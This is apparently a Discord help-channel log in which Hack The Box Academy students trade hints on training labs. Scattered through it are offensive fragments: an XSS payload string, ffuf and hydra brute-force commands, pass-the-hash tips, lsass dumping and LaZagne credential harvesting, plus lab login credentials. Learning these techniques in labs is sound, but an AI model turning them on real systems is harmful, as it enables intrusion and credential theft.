Hey. I'm in the Skills Assessment for Web Fuzzing, i'm at "Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains?" i just get two extensions from all 3 different subdomains i found, but HTB says my answer is wrong.. How do i write the answer, like ext1., ext2. etc or not, or what am i doing wrong?
hi! I am studying for the CPTS exam and I am following the path. At the moment I'm at the Nmap Scripting Engine section. I found the flag but it's not accepted...any clues?
Sometimes there is more than one flag in the lab, maybe you got the wrong one..
oh ok
Is someone available for Senior Web Penetration Tester - Intro to Whitebox Pentesting - section command and blind exploitation?
My problem was solved
What's the question?
Feel free to dm me to avoid spoilers.
the thing is everyone on the internet found my very same flag but mine does not work. I will keep digging.
Try and see if you have any whitespace before or after the flag. Had a similar issue when I did it! If I remember correctly, it also wasn't the flag I found first
I just found the flag without even using nmap lol 😄
Well done!!
nope. not well done. I must use nmap. so i'll dig deeper with nmap 😉
Don’t ask to ask
Just ask
Can I?
ok, now I did it with nmap. got it. 😉
Can admins be dm'd for questions about modules? I don't wanna spoil my module for others either, but I still have a question 🤷♂️
What do you mean?
So in this case don't get why people are saying don't ask to ask, if you did this for boxes you'd be banned
Best to wait and ask - but feel free to dm me, I will reply in a few min
if you're willing to do the sanity check for me, I'd appreciate it. That's why I asked first if anyone is available hours ago
coz I don't want to just DM anyone out of blue either
I hack through my phone because I love hacking but I don't have a computer
Yeah, that won't be appreciated as it's for modules and not everyone does modules
but yeah, dm me 🙂
finishing some work stuff - but will reply asap
Please answer me
It's hard to say. But what are you wanting to do? Hack The Box Academy ?
So I can't right?
I am asking what exactly it is you are trying to do
even the cheapest lap top will do
well, then you're out of luck probably, although I think it should be possible, it requires a lot of effort, and you'd spend most of your time trying to get your tooling to work. You def need a remote workstation to connect to, that's the only way I could see this happening
I just hate vi so much. You guys should do like a Tier 0 module for vi 😛
can someone help me with Web Fuzzing. I'm on the question: One of the pages you will identify should say 'You don't have access!'. What is the full page URL?
I got the answers for the 2 questions before: i fuzz every subdomain and get one .php page with the command ffuf -w /directory-list-lowercase-2.3-small.txt:FUZZ -u http://****.academy.htb:56223/FUZZ -recursion -recursion-depth 1 -e .html,.php,.phps,.php7 -v -fs 287 and one directory, but don't get the page saying "You dont Have Access"; when i visit the sites it's just an empty page, i tried with curl too but nothing. When i fuzz the directories it is showing 0.. Can someone help me out?
Get a computer, install a linux distro, sign up for a Hack The Box Academy subscription, do all the modules and then go do CTFs
has anyone done the xss module? i'm kinda stuck on the beginning of the xss discovery part where it asks you to test the payload <HtMl%09onPoIntERENTER+=+confirm()> from a scanner on the previous exercises. am i meant to get it working or is it meant to demonstrate that the scanner payloads don't always work?
if ur phone has a large screen u can use pwnbox in the academy
I don't have money
It's just $20/month. But there's a lot of free stuff too
for real world targets you can find a 5$/month vps and use it as an attack host
Paying gets more cubes and spawns of targets.. You may come a long way with free
but yeah just get an old rack bro and slap an ubuntu or something on it
Why? Just use HTB or vulnhub and get some vms..
$20 computer?
idk if it is legal to use pwnbox to do other ctfs on it
What pwnbox
in-browser hacking computer
Oh ok
Hello everyone, I started going through modules on web attacks on HTB, but I don't think I understand the very essence of what I'm doing, where can I get deeper into the basics of web attacks?
The module covers 3 types of web attacks: HTTP Verb Tampering, Insecure Direct Object References (IDOR) and XML External Entity (XXE) Injection. Feel free to look further into any of those attacks.
Not sure which channel to ask this in, but are there any forbidden tools on exams? Like CWEE, it has no rules on the page for prohibited tools, and I guess there's no proctoring either as with Offsec, but Burp Pro for example could give you an advantage
Going crazy.. I'm on the last question in the Skills Assessment Web Fuzzing; I get this: <div class='center'><p>This method is no longer used.</p></div> What other method am i going to use? i'm doing this: curl -X POST http://faculty.academy.htb:56223/*/*.* -d "=" -H "Content-Type: application/x-www-form-urlencoded" -H "User-Agent: Mozilla/5.0" -H
Also an extra question, if I purchase a voucher, can I access the exam right away, or you need to schedule the exam for a pre-determined time?
Try other methods ?
https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods
It's HTB that is saying this solution is no longer used. Not the GET method..
or POST
This I’d like to know as well
sent a msg to support about it, will put the answer if I get to know something
You can start your exam whenever you want
its not proctored, and no forbidden tools
just don't ask anyone for help
nice
I've just finished the skills assessment for the Shells & Payloads module (https://academy.hackthebox.com/module/115/section/1139). Can I DM anyone about one of the alternative paths? I'm trying to understand if I missed something
the AD sets in the Active Directory Enumeration & Attacks module, An ACE in the Hole/Stacking The Deck subsections (those which have the dual IP setup) seem to take 30min+ to fully load
any insight on this one would be appreciated 😅
You removed the need for a password to root, so a good idea is to attempt to log in as root.
I'm on Attacking Web Applications with Ffuf > Skills Assessment - Web Fuzzing: "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?"
I have the answer, but it's not submitting and jiggling the answer hasn't helped. E.g. I've tried:
- Literally the full url: [http]://xxxx.yyyy.zzz:pppp/dddd/page.ext
- Without the http://: xxxx.yyyy.zzz:pppp/dddd/page.ext
- Without the port
- As an IP address even though a vhost is at play
Anyone willing to DM me to check my answer is right and give me a clue what this thing wants?
yeah send over the link in your DM i think i've done this one
Hi everyone, this is maybe not the right place but I'm unable to post in General.
Has anyone taken the CREST CRT preparation course and passed the exam, or was additional training required? I'm interested in hearing your journey if you've taken the CRT, what worked well and what didn't.
TIA
ask in #careers-and-certs. verify to get access -> #welcome
hey, i am stuck on a problem, can you help ?
shoot
using the crackmapexec LDAP and RDP Enumeration module i managed to get the hash from svc_gmsa$, but i tried almost everything to get the flag.
I am stuck with a hash
Use the service account you found to access the shared folder serviceaccount and read the flag.
well, have you tried to authenticate with the hash ?
--local-auth
STATUS_LOGON_FAILURE
i can list the shares but everything else seems to be wrong
i tried cracking the hash with hashcat but no luck, so i can use smbclient
If you can authenticate with the hash, you can read a file
have you tried passing the hash like has been suggested?
you tried this, correct -H <NT HASH> ?
yes
ok, in that case, consider what other protocols can be used to execute commands if you only tried it with smb
hint: nxc <protocol>
nxc: error: unrecognized arguments: -H HASH
bump 🙂
hey guys, I was able to solve the Firewall and IDS/IPS Evasion - Hard Lab
can someone enlighten me?
i'll try a few things
-sT -T4 tends to speed it up
mh...thanks guys, I will try again
i meant something like this -H 30B3783CE2ABF1AF70F77D0660CF3453. It works with both cme and nxc, though nxc is not installed by default on kali
Dude. Stop saying the port lol
netexec was preinstalled on my kali
interesting, I had to install on mine, but my kali is super old
i am using -H HASH (I don't want to reveal the true hash)
thanks guys! I found THE PORT with your parameters now! love ya all ❤️
Good sign though that you thought to ask the questions instead of just mindlessly following
i MUST understand, that's the point of real learning. thanks! 🙂
RTFM is a mantra; read the fucking manual
If the manual doesn't provide answers then question away
thanks for the insight!
I have links in my profile to websites that explain the common questioning phenomena, such as the xy problem
I will check immediately. I am a senior manager. I want to get CISSP but before that i want to really understand things and get CPTS and OSCP at least. I think CPTS will outclass OSCP soon as industry standard!
Especially since OSCP basically shot themselves in the foot (short term) with OSCP+
Well offsec*
yep! plus i love to program and hack things. I will get the bug bounty cert too. I did QA for ages and I was very good at finding bugs. Plus I studied front end and back end development already.
does anyone know how to get the fedora34 iso?
Honestly, and sincerely, do CWEE if you already know programming and web basics
Googling is hard 
third result...damn.
Were the first two "ads"?
almost 😄
I will!!!
for the love of god I will take them all lol
The only reason I suggest CWEE is because that sounds more up your alley than cbbh, and cbbh is honestly the weakest cert
I agree with you
basically I do not need it, I will bug hunt already after cpts and cwee
the mindset is kicking in more and more and that is the most important thing
lol I didn't know Google existed :)))). no more seriously I asked that because every time I launch it my PC crashes
enough for today... No luck, i am getting errors like authentication failure and so on. Tomorrow is another day
That's a different question entirely
well...fix the pc 😄
And should be taken up with RH/fedora support not randoms on an infosec discord
#1024429874246590575 is a gamble for help
bro, I asked this question to know if I installed fedora on the right site, nothing more complicated
I know it can sound stupid, ask chatgpt stuff too. it is very helpful.
listen to the mods...
I'm not a mod
I did, he started to talk sh.t
ops
no I don't think the pc is the problem
I mean fix the OS
Then re-download and reflash the usb you're using
oh man...
Or use a new usb entirely
even pwn box started to throw errors
Yes master 🙂
Either way; the conversation around installing fed isn't for this channel
#1024429874246590575 is a gamble but you can ask there and provide more details and maybe screenshots
👍
would I ssh to root?
No problem
or su to root
-Pn?
Give a shot
ah it works now but it's really slow
thank you!
#starting-point then
is your vpn connected
This channel is for academy modules, not starting point machines
Move this to #starting-point
you are right
https://academy.hackthebox.com/module/244/section/2703
In the source code provided with the assessment the '?' symbol is not present but on the page it is given.
Both are correct right
i got the flag. I restarted my computer, then i used --spider and --get-file to download the flag.
That was bothering me, now it's fixed
I need help with: Getting Started | Public Exploits |
"Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file"
||Using the IP and port number and going to that address, I see what type of exploit it wants me to use, I set up the exploit and use it, but when I get the backup file, it doesn't contain any information regarding a flag or information that I can use. The file I get is /etc/passwd which is default, but when poking around and trying to run a dir scan with gobuster, I don't find any other domains that I can pull from. If I try a different path, it doesn't return anything. I have also tried accessing the /simple-backup directory, but that just shows as empty. I've tried uploading a web shell and get close, but it fails after not receiving a 200 OK||
Idk I feel like I am way overthinking this
You're definitely overthinking
Look at the payload you're using and what can be changed, no uploads needed
I'm in the medium footprinting lab under the pentest path. I found sa and alex creds but I can't log in to the sql. Also while looking on the HTB community webpage I saw a screenshot of someone else doing the same nmap scan and they have different ports open, like I don't have ssh, imaps and pop3
I also tried the udp scan but it times out
It's running internally, not externally
I don't know what u mean by that
Meaning sql is running on the inside not the outside
Also consider reused passwords
Yes yes I found the sql database but the creds I found don't work
Alex and sa, i tried both of them
Try logging in as a powerful user, maybe a default account on every Windows machine
Then running the db
Having the same issue. Did you ever figure out a fix?
You saved the file to C:\
That's why it can't find the file
You need to specify the filepath
Your dir command even tells you it's in C:\
||payload being the FILEPATH ? or the backup file that gets downloaded. I'm using the wp_simple_backup_file_read exploit||
Bingo
I'm going to drive into a median with my seatbelt unbuckled, I tried I swear everything but that, alr thank you godsend
Use the full speedometer
ofc, if I paid for it, Im gonna use it
Doing the easy lab and have already gotten the files and changed the permissions on them but when I try and upload it tells me overwrite permission denied. Any help?
In footprinting that is
Do I rm the files that are there or am I missing something
hi, i am having problems with one of the exercises. I am supposed to setup a localhost for my xxe.dtd file. The server is not accessible from outside addresses. Can anyone push me in the right direction in solving this issue please? probably some kind of firewall/security for my own protection? I'm running my own Kali Linux in VirtualBox. Thank you in advance!
Hi guys, not sure if here is the right place to ask, but do you know if the balance I get from a gift card can be used towards buying a yearly academy subscription ?
If your VM is on the VPN the target should be able to reach your VM
ah yes, i was using the wrong IP, thanks!
Blind SQL Injection module, it says on the 3rd section "Note: You can start the VM found in the question at the end of the next section for the module's practice web apps.", but there's no web app to start. I can only start the MSSQL database on all the pages. Can someone enlighten me on where the web apps can be spawned?
bump 🙂 just want to understand if what's in one of the tips was discoverable without it
I don't understand this, it says they are the same but according to wikipedia they are different but similar
Monitor mode is only for WNICs and promiscuous is for both wired and wireless interfaces right?
hi guys, still on the password cracking module, in the password reuse/password default section. I'm using the default sheet credential and i get this error
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[ERROR] invalid line in colon file (-C), missing colon in line: MySQL,admin@example.com,admin
can someone explain it to me?
Guys if I'm doing udp scan and the box responds to me from nmap -sU scan but doesn't respond with snmpwalk or braa what does it mean
Anyone who finished Advanced Deserialization for a few pointers on the XML Section?
I think I'm missing just the last part
Desktop of the jump host
I'm doing the password attacks section on credential hunting on windows and the issue is there's no .exe file version of lazagne
but the section requires an .exe file for lazagne
but in the lazagne github there is no such file only .py file
what should I do?
I tried looking up how to compile python to exe but I need a compiler for that and the windows host that this section uses has no access to the internet
and I can't find the .exe file anywhere in the LaZagne github that I cloned onto the Parrot attack box
You could dm bunny
Well ask him first but usually he doesn’t mind
He finished the path
Hi guys, I'm in the AD Enum and Attack module currently.
I'm trying to run bloodhound-python on the domain controller while proxying using sshuttle, also tried proxychains, but I keep getting an error about DNS timeout (increasing the timeout won't solve it). I can run bloodhound-python if I ssh to the attack box.
Is there a way I can solve this?
I went with his opinion on hard modules and now I'm getting my as$ kicked 😅
@chilly geode not the place. Move on
hi is anyone able to help me with the module?
There should be an exe version, you checked the releases page of lazagne yeah?
the thing is even if I get an exe version I still can't copy exe files over to the windows box
I use cat but that doesn't let me copy the entire file and
if I use text editor it won't let me view data
Sure you can
Plenty of ways to transfer files
no but like I have to be able to view data
xfreerdp has the /drive: option
ok
You can use http.server and download the file
ok
ok
like this?
└──╼ [★]$ xfreerdp /v:10.129.17.140 /u:Bob /p:HTB_@cademy_stdnt! /drive:/home/Desktop/LaZagne
what am I doing wrong there
got it working with smb
or not smb but /drive option
/drive:<name>,/path/to
Ya already got that working, it's copying files
We’ll see how well it works after I get everything copied over
could I dm someone for a little nudge for Attacking Common Services - Hard skill assessment. (last question)
😂 yeah that’s definitely the case with the cwee modules
At least in my experience
Especially vautia knows how to make our life difficult with his sa’s
it's saying the version of lazagne is incompatible with 64 bit windows but I downloaded the 64 bit version
what link did you use to download? protip: it's a good idea to copy the tools from the various modules over to your box to use later.
github
well that's why, github isn't a valid link 😛
I downloaded onto attack box then copied into windows box
but I downloaded the file I didn't use a link to github itself to run it
so I'm unsure what you're saying
i'm saying throwing 'github' into your browser isn't going to navigate you to a link, it's going to perform a search for 'github'. what is the actual real full link you used to download it?
git clone https://github.com/AlessandroZ/LaZagne.git
that was to get it to attack box
then used /drive parameter in xfreerdp to copy it over
if you cloned the github you'll need to compile it, easier just to download the release
ok I am having some trouble finding the actual release. I googled it and the github was the result I got
wait found it
will try downloading now
ok
It’s funny/frustrating though how often I had to dm bunny where we had pretty much the same payload but it worked for him but not for me
And it ended up being a matter of encoding or removing a linebreak
Since then I hate web even more, but I just want to finish my oswe
I found one password but lazagne is only open to view results for a split second
how do I store results longer?
I got the answer to one question
Did you open through cmd?
Hey guys i'm stuck on something in the skills assessment for pivoting and tunneling
don't just double click it, open a terminal and run it from there
i have an lsass.dmp that i need to transfer to my attack host and i'm stuck, like nothing is working. i just tried an http server on the machine and tried to take the file like this but it says it can't connect to the remote server, also ftp server, smb etc
have you done the file transfer module?
ok I have completed the first three questions
now gonna take break then work on fourth question
I think I figured out what I was asking
just in the beginning i did it from my attack host but then i remembered that i haven't access to the 172.16 network, so i transferred mimikatz to the first pivot host i had connection with but idk why i can't transfer from pivot to target
i'd probably just setup chisel on the pivot and rdp into the machine that's on the internal vlan and transfer via rdp personally
I even ran Ysoserial as to see where I could be making a mistake.
Adapted the XML and nothing.
Web stuff makes me miss AD
I absolutely despise web but it matters most to my work
I prefer ad by miles
hey there i'm new here and needed help with this question >>>>>>What does the acronym Linux PAM stand for?<<<<<<<<<<<<< PLEASE HELP I'VE TRIED EVERYTHING I CAN THINK OF.... AND IT STILL SAYS WRONG ANSWER.
Welcome. As you’re asking for help with a module, please state the module and section. Have you tried google?
WELL IT'S THE QUESTION ON THE "VPS HARDENING" SECTION.
Google it
Just wanted to check something: If I dump password hashes for local users on a system, it's possible for those password hashes to work on other systems in the environment as well, right?
It depends
Depends on whether the same password is used? Or are there other factors too?
If it's like a default password, maybe
Often you'll have luck with, for instance, admin reuse
But yeah it'd have to be the same password to be usable. As that's what the hash is based off of
Gotcha, thanks for the clarification!
And the other machine on the network would have to have some sec settings to also allow it
sec = security?
Yes
Ntlm should be deprecated and not allowed/used, however it's just not configured
I don't follow?
Meaning the rc4/ntlm algorithm that allows for PTH is literally used bc of misconfiguration/laziness
I believe the cpts ad module explains it a bit more
Ahh, ok. I remember what you're talking about now.
I'd forgotten about it, I'm sure it's somewhere in my notes though. Gotta go back and look for it in the module.
So if it weren't for that misconfiguration/laziness, then pass-the-hash attacks wouldn't work, yeah?
idk
everything was great till last question
can i dm you regarding this?
oh woooooow, I completely missed that! Then again maybe it would have been too easy 🙂 Thank you!
Where in this chat do I post if there is a typo in one of the academy courses. Specifically Intro to Whitebox Pentesting
Code Review - Authentication. The validateEmail snippet says SIP instead of SNIP
Thank you
Where can i chat if I am seeking help regarding a task in the footprinting module of the pentester path ?
This is the place 👌
I'm on the IMAP module in the Pentester path trying to enumerate this server using imap
Used openssl, curl and whatnot
I used the default robin:robin credentials.
Now I am connecting to imap server and getting the cert issuer email ID as cto.dev@dev.inlanefreight.htb And that should be the admin email ID right ?? But the answer is wrong so I am clueless as to what is the correct answer.
Also for the next question which is finding the flag, I have connected to IMAP and am using IMAP commands to navigate to the flag, but I seem to be super confused about how to access the message.
I don't want the answers to them but I hate being stuck and clueless about stuff that should supposedly be simple 🙂
Anyways, here is an SS for context:
I guess I cannot paste an SS here.
What am I doing wrong? Should be quite simple..
Hi, do you recommend using Windows as the OS while doing the Windows binary attack modules?
You need the pipe: `<command> | grep "<whatever>"`.
I'm currently using Wine, but not feeling 100% comfortable.
I did Google it and it still says I was wrong??
CAN SOMEONE PLEASE HELP ME WITH THIS QUESTION!!!
Caps please 👀 and your screenshot is a 404
@modern sparrow please, post without caps. No need for them.
Also, google it, I just tried it and I got the answer in 5 sec
Dude stop with the caps...
Dude, calm down, it's not that big of a deal..
It is. I told you to stop twice.
And the answer is correct. Make sure that the capitalisation of your words is correct and there are no spaces in front or at the back.
I'm sure it's been considered before, what's the staff's stance on trimming whitespace in the answer boxes ? Would cut down on support burden in a non-negligible way it seems
Might be worth adding /feedback
But I agree 🙂
sure, I'll leave a note 🙂 I thought it must have come up before
If salt is used with these hashes, then no.
But if not salted, then yes (if they use the same password, of course).
Could very well mess up many answers.
How so?
Try to think how the module was constructed.
There is something at the end that is a security measure to select who can have access to the network.
If anyone can give me a few pointers...
I think I didn't understand correctly the type part of the section
Can anybody help with the Password Attacks page "PtH Linux"? Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio. I have imported the ccache file, klist says julio, but when I run the smb command it gives me this error:
```
smbclient //dc01/julio -k -c 'get julio.txt' --no-pass
gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/dc01 failed (next[(null)]): NT_STATUS_INVALID_PARAMETER
session setup failed: NT_STATUS_INVALID_PARAMETER
```
How do I fix this?
Hi,
Module: Attacking Common Applications
Section: Skills Assessment I
Section Link: https://academy.hackthebox.com/module/113/section/1097
I have managed to get the dir command to run even on the Administrator's Desktop. But I am not able to print the contents of the flag. Help!
Use the full path to the commands you are executing
and URL encoding.
Tried that. I could not get the absolute path to work. I used a relative path to execute the dir command on the Administrator's Desktop.
That's an example. It doesn't mean you have that header in the response (which is your case), and you should be using -i with grep to ignore case distinctions. Another useful flag to add is -s to curl so it doesn't show the progress meter or error messages.
tbh just get a revshell and read the flag
I am not able to do this. Can I DM you?
How do Tier 4 modules differ from the tier 3 ones?
Good day. I'm an absolute beginner on HTB, currently enrolled in the CDSA path. Trying to complete my first exercise in the "Introduction To The Elastic Stack" section of the "Security Monitoring & SIEM Fundamentals" module. I am supposed to use Kibana to execute some queries but I haven't the first idea where to find it. Have searched "Kibana", "Elastic*" to no avail.
I tried Metasploit, if that's what you are referring to.
Sure.
I think tier 4 modules correspond to "Insane" difficulty and Tier 3 correspond to "Hard" difficulty. Just how Tier 1 and 2 correspond to easy and medium
Modules are split into different Tiers based on their cost. The Tier of a module does not reflect its difficulty.
I need some guides to solve the Network Enumeration with Nmap hard lab. I finished the easy & medium labs. I need hints to complete that module. I'm available in DM; you can guide me to the answer there.
Well, that's the obvious, but other than that? Why price some modules more than others? Are Tier 4 modules more crucial to us, and should we focus more on them?
Thought Tier 3 modules were rated hard in difficulty 🤔🤔
Need help guys
Follow the steps to the evasion section
Tier-3 content is designed to cover specialization paths. Tier-4 content is designed to cover advanced specialization paths and how niche the topic is. It does not represent the difficulty but the specialization.
There are many Tier-3 modules rated as Medium.
Probably depth of information / difficulty of finding content in the wild.
I was wondering what happened to the people who got PowerView when it was a T4 module.
wdym?
Hello. I'm in the module Cracking Passwords with Hashcat. The question is: Identify the following hash: $S$D34783772bRXEx1aCsvY.bqgaaSu75XmVlKrW9Du8IQlvxHlmzLc. I get the hash type with hashid '$S$D34783772bRXEx1aCsvY.bqgaaSu75XmVlKrW9Du8IQlvxHlmzLc' and get an answer in this format: * > v.x. I've been trying all kinds of formats when I put in the answer but it says "Wrong" all the time. The hash type is correct, I know it, but what am I doing wrong?
Active Directory PowerView was a T4 module and it got lowered to T3 when the AD path was introduced
So people who got it when it was a T4 module got it at double the current price
Use -m to get the hashcat mode, if I understood you correctly.
Done it too.
The problem is probably how to type the answer. I've been trying different typing with upper and lower case etc., and space or no space, and , or no , etc.
Solved it. It was like I said, the format of the answer.
Hello everyone. I am new here. I'm requesting your help. There's a question on HTB Academy under "Information Gathering - Web Edition: Subdomain Bruteforcing" that has been bugging me for days and I'd love help on solving it.
It was a space before > and the answer did not accept it with the space, so I deleted the space and now it is OK..
Good.
What is troubling you?
I've DMed you.
They got their cubes rewarded back 🙂
Hello
This is the question.
Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com.
This is weird. When I tried to exploit using Metasploit earlier, it was not working. It said Exploit Completed, but no session was established. But now, it works 😕
They are still alive
I have been running dnsenum, ffuf and gobuster on the site (inlanefreight.com, provided in the question) but I keep getting similar subdomain results. Let me share the output.
www.inlanefreight.com. 131 IN A 134.209.24.248
ns1.inlanefreight.com. 122 IN A 178.128.39.165
ns2.inlanefreight.com. 137 IN A 206.189.119.186
ns3.inlanefreight.com. 300 IN A 134.209.24.248
support.inlanefreight.com. 300 IN A 134.209.24.248
my.inlanefreight.com. 300 IN A 134.209.24.248
customer.inlanefreight.com. 300 IN A 134.209.24.248
None of the above seems to be the needed answer. There's also no target to spawn on this question.
https://academy.hackthebox.com/module/144/section/1253
Hello guys, who is a hacker and can help me out?
🙃
have you tried bruteforcing these subdomains too?
Do you know if there will ever be a cube sale for example on Blackfriday?
Hey. Thanks. It worked. I have been having the answer all along. I thought they wanted an FQDN so I provided my answer with a . at the end and it wasn't needed all along. lol:)
Thank you.
Anyone else having connectivity issue with RDP on Active Directory Enumeration & Attacks ?
I am just having blackscreen when I attempt to log in
It was the login black screen, gg, I am dumb 💀
I heard no, but I don't know much.
These two resources might help you out:
https://www.atmail.com/blog/imap-101-manual-imap-sessions/
https://www.atmail.com/blog/imap-commands/
Same, and I need to restart the lab multiple times or wait up to 30 min.
Recently the Internet Archive got hacked and the adversary stole user data. There is a section on the Wayback Machine in Information Gathering - Web Edition to find the total number of hacking labs on HTB on 2018 Aug 8, but I don't see any archive on that date.
I am assuming other data like snapshots of websites are also affected in this attack.
Just click on the black screen and press Enter multiple times :))
Oh, I wish I knew that. I completed these sections, only the SA is remaining.
Hello everyone, I just joined and am working on my first module but I am having an issue, can someone help me?
I'm working on the Introduction to Windows section, talking about remote access.
Answer this then.
So I believe I followed the instructions but it is throwing this error at me, saying WARNING Certificate name mismatch on the Parrot terminal.
What exactly are you doing?
Do you have your VPN connected ?
Ignore, I just realised you are on Parrot.
Uuuuu.. I am VERY new to this.
Well, it is teaching me about connecting to a Windows target.
Is it talking about VPN?
OK, and you're doing it from what? Your own machine or from the virtual machine provided at the end of the section (Parrot OS)?
I am using the one provided in the section.
OK, and what command / tool are you using?
Bash, I believe.
Yes, but what command do you enter in your terminal?
xfreerdp /v:10.129.60.49 /u:htb-student /p:Academy_WinFun!
try
xfreerdp /v:10.129.60.49 /u:htb-student /p:'Academy_WinFun!'
Ooo, so it did the same thing, but I just read the "Do you trust the above cert Y/N", answered Y and it opened!
Yes, you have to type Y or yes.
A lot to learn.. haha, thank you.
np
There is no data on the Internet Archive on 2018 8th Aug.
You have to search for hackthebox.eu, not hackthebox.com.
It used to be hackthebox.eu.
Did you know hackthebox wasn't always .com?
Attacking GraphQL mini-module
Skills Assessment
I don't know what else to try, I only see some keys that are useless, there is no relevant field to mutate, nor have I found a SQL injection.
Any hint?
? then
Someone else told you what htb's old tld was
Can anyone give me a hint on the Password Attacks module, Attacking Services, brute forcing RDP? I tried crackmapexec and hydra; for hydra it says all accounts are inactive, and for crackmapexec I can't find a valid combination. I'm using the wordlists provided in the resources.
Hello guys! Who has already completed the Wi-Fi pentesting module?
A whole lotta people
Have you?
Yes
Just ask away
Just get to the point lol
Can I DM you?
It’s easier if you ask here cause other users might have the same question
Easier for people to find the info they need after
I'm having issue regarding the skills assessment questions!
I don't know why the access point isn't completing the handshake with the station. As you know I need it to be able to crack the password.
Still, I tried to monitor all the bands but nothing. I can see that a station is associated with it but no handshake captured.
I'm not allowed to send messages in #general.
Read and follow #welcome
Hello, I am having an issue submitting an answer I "think" is right. The question is: Which Windows NT version is installed on the workstation? (i.e. Windows X - case sensitive). My answer: Windows 10.0.19041, but it says it's wrong?
Hey guys, I cannot get the krbtgt hash in the Documentation and Reporting lab.
After achieving Domain Admin, submit the NTLM hash of the KRBTGT account.
Use hydra with the wordlist in the resources.
I extracted the ntds.dit hashes but, as I read here, it's not that hash. I tried to DCSync with mimikatz but nothing.
Hello everyone! I'm struggling in the skills assessment of the Pivoting and Port Forwarding module. When I do my SOCKS proxy and then proxychains nmap to the IP that I've found (with of course the -Pn and -sT options), I cannot see any port that is up, nor the view shown previously in the module (where all the "time out" or "ok" messages appear when it hits a port). I've checked and it's the right IP address found with the ping sweep.
Does anyone have a clue why?
Since you mentioned the band, right at the end there is a technique as to not get “blocked” by the device
You can connect to it via GUI once you perform the necessary technique
Is it very far in on the users? Because I tried using hydra for 20 minutes and it still didn't find it.
It just took me under 10 sec.
You did `hydra -L username.list -P password.list rdp://(ip)`, right?
It doesn't work for me.
Using Pwnbox? People say they had problems using a local VM, then used Pwnbox and got it in a few moments.
So it's probably a wordlist issue.
(Perhaps), and I'm not even sure about this specific module, but I do recall specifically people struggling with the brute-forcing modules and that coming up (search the channel if inclined).
Are you using sudo proxychains?
This has caused people grief in the past, not sudo'ing the command.
I'm trying to capture all the traffic within the wifi range. I don't need the technique you are referencing to be able to have a view of the network activity. I tried anyway
I can see that there is an association between a station and the access point, but there is no EAPOL handshake captured in the traffic.
Have you tried different clients? One should give you a complete handshake
Oh! Thanks, that was almost it! ...almost because now I get the view shown in the examples but every port is set to denied x)
Glad I could almost help 😛
lmao
I'll try to reset the target and pwnbox
You mean clients which are not associated with any AP?
Bro thank you so much it worked.
I can’t remember exactly how many clients are connected to the AP since I’ve completed it a couple of weeks ago. But if I remember correctly there are two
But that SA is pretty straightforward
That works now! Thank you exciton!
Done 👍! Thanks
Does anyone know the updated command for sqlplus? I'm on Footprinting Oracle TNS and I got odat to run, but when trying to use the sqlplus tool, it comes back as command not found? I am using the HTB Pwnbox.
Thanks a ton my guy !
That got you sorted out?
NVM, downloaded it to the Pwnbox.
YUP
Hi guys, I'm having trouble in the AD Enumeration & Attacks chapter. In the chapter about Privileged Accesses the exercise spawns two machines, the target and the attack machine. Is it normal that I cannot SSH to the attack machine with the given credentials?
The creds are given at the beginning of the lab.
In the setup scenario.
You mean at the beginning of the module?
no
Did you read this section?
Privileged Accesses
My god, I must've tried all the possible combinations except this one lol
That's because I was issuing the SSH from the foothold with the internal IP.
I must say this format as is is slightly confusing
I mean, it is written at the very start of the section, so you can hardly say that.
But yeah, it is different from usual, so you might not be used to it.
No no, but the point is, I've seen it. My mistake was trying to SSH from the foothold with the internal IP. This was not working. I must have tried by mistake to authenticate from my machine with the internal IP and the credentials shown in the scenario setup, and with the external IP but the credentials shown at the bottom.
however, thanks a lot for the quick help 🙂